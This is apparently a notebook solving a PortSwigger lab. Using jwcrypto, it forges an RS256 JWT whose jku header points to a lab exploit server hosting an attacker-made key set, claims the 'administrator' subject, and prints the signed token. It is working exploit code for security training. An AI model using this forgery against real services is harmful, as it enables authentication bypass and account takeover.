## Inject self-signed JWT via jku header parameter.
Seems like the least amount of work to implement this attack from building blocks in `jwcrypto`.

See https://portswigger.net/web-security/jwt.

In [1]:
from jwcrypto import jwt, jwk
import uuid

In [2]:
kid = str(uuid.uuid1())
kid

'9745d382-d23d-11ed-9bde-6045bd83ca88'

In [3]:
key = jwk.JWK.generate(kty="RSA", size=2048, kid=kid)

In [4]:
jwks = {
    "keys": [key.export_public(as_dict=True)]
}

See https://stackoverflow.com/a/20776329.

In [5]:
import json
with open("jwks.json", "w") as f:
    json.dump(jwks, f, ensure_ascii=False, indent=2, sort_keys=True)

In [6]:
header = {
    "kid": kid,
    "alg": "RS256",
    "jku": "https://exploit-0ac100220323c1c5811d29e401cf0087.exploit-server.net/jwks.json"
}
header

{'kid': '9745d382-d23d-11ed-9bde-6045bd83ca88',
 'alg': 'RS256',
 'jku': 'https://exploit-0ac100220323c1c5811d29e401cf0087.exploit-server.net/jwks.json'}

In [7]:
claims = {
    "iss": "portswigger",
    "sub": "administrator",
    "exp": 1680543199,
}

In [8]:
token = jwt.JWT(header=header, claims=claims)
token.make_signed_token(key)

In [9]:
token.serialize()

'eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHBzOi8vZXhwbG9pdC0wYWMxMDAyMjAzMjNjMWM1ODExZDI5ZTQwMWNmMDA4Ny5leHBsb2l0LXNlcnZlci5uZXQvandrcy5qc29uIiwia2lkIjoiOTc0NWQzODItZDIzZC0xMWVkLTliZGUtNjA0NWJkODNjYTg4In0.eyJleHAiOjE2ODA1NDMxOTksImlzcyI6InBvcnRzd2lnZ2VyIiwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.BHMQDiAynF2cAAd567UiLmexn4aAu5feQASe_uE9Wqf7hF8WOI0MwlFfdaPG4Nz8j66n6PDEKY1QBR-m99qAqFKtwWN8231GZKiZmBjAUG89QHQ9T2sLqqCmIFuHaeIeSCUkjNQAXmalkXSnOgaUFscW5lStR4cJq0HKBXH3nT30PVwZ76Cbr-iGZoW6hhjk3jvNkGMiD9jCIYdTviHIS-3meiLW6HhiWJuow1Gv5marGv1nKJzJK8PSJsLRq94q8HE679OKYQg5boHihDlSSNl8RyBEaGfbUUGgnrQeHt4193cU70O-O25hn2S1TnFit8qGmIgWDt3wPEauI6CHHA'